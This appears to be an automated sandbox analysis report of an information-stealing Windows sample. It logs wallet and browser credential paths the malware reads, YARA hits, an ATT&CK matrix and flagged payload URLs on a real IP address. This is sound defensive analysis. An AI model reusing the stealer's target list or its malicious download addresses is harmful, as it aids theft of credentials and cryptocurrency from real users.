(Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: \\config\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                  Source: Yara matchFile source: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5984, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 0.2.file.exe.70aac0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.70aac0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.6e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 6856, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5984, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8B0C40 sqlite3_bind_zeroblob,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8B0D60 sqlite3_bind_parameter_name,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7D8EA0 sqlite3_clear_bindings,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8B0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7D6410 bind,WSAGetLastError,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7D6070 PR_Listen,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7DC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7DC030 sqlite3_bind_parameter_count,
MITRE ATT&CK Matrix (cells with a leading number are the techniques the report flagged; the number is the badge count shown in the report's matrix)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 511 Process Injection | 2 Obfuscated Files or Information | 1 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | 4 File and Directory Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Masquerading | NTDS | 55 System Information Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Virtualization/Sandbox Evasion | LSA Secrets | 1 Network Share Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 511 Process Injection | Cached Domain Credentials | 141 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 12 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph (ID: 1442218, Sample: file.exe, Start date: 15/05/2024, Architecture: WINDOWS, Score: 100)

Sample level: DNS steamcommunity.com. Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 8 other signatures.

file.exe (started)
    Signatures: Contains functionality to inject code into remote processes; Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
    -> RegAsm.exe (started)
        Network: steamcommunity.com 23.194.234.100, port 443, local port 49730, AKAMAI-ASUS, United States; 95.217.240.101, port 443, local ports 49731 and 49732, HETZNER-ASDE, Germany
        Dropped: C:\Users\user\AppData\...\vcruntime140[1].dll (PE32); C:\Users\user\AppData\...\softokn3[1].dll (PE32); C:\Users\user\AppData\Local\...\nss3[1].dll (PE32); 10 other files (none is malicious)
        Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Found many strings related to Crypto-Wallets (likely being stolen); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); 5 other signatures
        -> cmd.exe (started)
            -> conhost.exe (started)
            -> timeout.exe (started)
    -> RegAsm.exe (started)
        Signatures: Searches for specific processes (likely to inject)
    -> conhost.exe (started)

Graph counters (created registry values / files, as shown next to each node): file.exe 1; RegAsm.exe 1 45; cmd.exe 1; timeout.exe 1.

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Source | Detection | Scanner | Label
file.exe | 100% | Avira | HEUR/AGEN.1317471
file.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\ProgramData\GHIJJEGDBFII\freebl3.dll | 0% | ReversingLabs |
C:\ProgramData\GHIJJEGDBFII\mozglue.dll | 0% | ReversingLabs |
C:\ProgramData\GHIJJEGDBFII\msvcp140.dll | 0% | ReversingLabs |
C:\ProgramData\GHIJJEGDBFII\nss3.dll | 0% | ReversingLabs |
C:\ProgramData\GHIJJEGDBFII\softokn3.dll | 0% | ReversingLabs |
C:\ProgramData\GHIJJEGDBFII\vcruntime140.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll | 0% | ReversingLabs |
                  No Antivirus matches
                  No Antivirus matches
Source | Detection | Scanner | Label
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417. | 0% | URL Reputation | safe
https://store.steampowered.com/subscriber_agreement/ | 0% | URL Reputation | safe
https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli | 0% | URL Reputation | safe
https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE | 0% | URL Reputation | safe
http://www.valvesoftware.com/legal.htm | 0% | URL Reputation | safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe | 0% | URL Reputation | safe
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi | 0% | URL Reputation | safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | 0% | URL Reputation | safe
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94 | 0% | URL Reputation | safe
https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh& | 0% | URL Reputation | safe
https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l= | 0% | URL Reputation | safe
http://www.mozilla.com/en-US/blocklist/ | 0% | URL Reputation | safe
https://mozilla.org0/ | 0% | URL Reputation | safe
https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw& | 0% | URL Reputation | safe
http://store.steampowered.com/privacy_agreement/ | 0% | URL Reputation | safe
https://store.steampowered.com/points/shop/ | 0% | URL Reputation | safe
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta | 0% | URL Reputation | safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe
https://store.steampowered.com/privacy_agreement/ | 0% | URL Reputation | safe
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | 0% | URL Reputation | safe
https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016 | 0% | URL Reputation | safe
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b | 0% | URL Reputation | safe
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png | 0% | URL Reputation | safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | 0% | URL Reputation | safe
https://store.steampowered.com/about/ | 0% | URL Reputation | safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF | 0% | URL Reputation | safe
https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC& | 0% | URL Reputation | safe
https://help.steampowered.com/en/ | 0% | URL Reputation | safe
https://store.steampowered.com/news/ | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
http://store.steampowered.com/subscriber_agreement/ | 0% | URL Reputation | safe
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v= | 0% | URL Reputation | safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | 0% | URL Reputation | safe
https://steamcommunity.co | 100% | Sophos S4 | illegal phishing domain
https://store.steampowered.com/stats/ | 0% | URL Reputation | safe
https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp | 0% | URL Reputation | safe
https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=dERfFkkJ-bKK&amp | 0% | Avira URL Cloud | safe
https://store.steampowered.com/steam_refunds/ | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif | 0% | URL Reputation | safe
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
https://95.217.240.101/nss3.dll | 100% | Avira URL Cloud | malware
https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV | 0% | Avira URL Cloud | safe
https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v | 0% | URL Reputation | safe
https://steamcommunity.com/?subsection=broadcasts | 0% | Avira URL Cloud | safe
https://95.217.240.101/nss3.dll2 | 100% | Avira URL Cloud | malware
https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.j | 0% | Avira URL Cloud | safe
https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub& | 0% | Avira URL Cloud | safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p | 0% | URL Reputation | safe
https://store.steampowered.com/legal/ | 0% | URL Reputation | safe
http://www.sqlite.org/copyright.html. | 0% | URL Reputation | safe
https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl | 0% | URL Reputation | safe
https://95.217.240.101/freebl3.dll | 100% | Avira URL Cloud | malware
https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l= | 0% | URL Reputation | safe
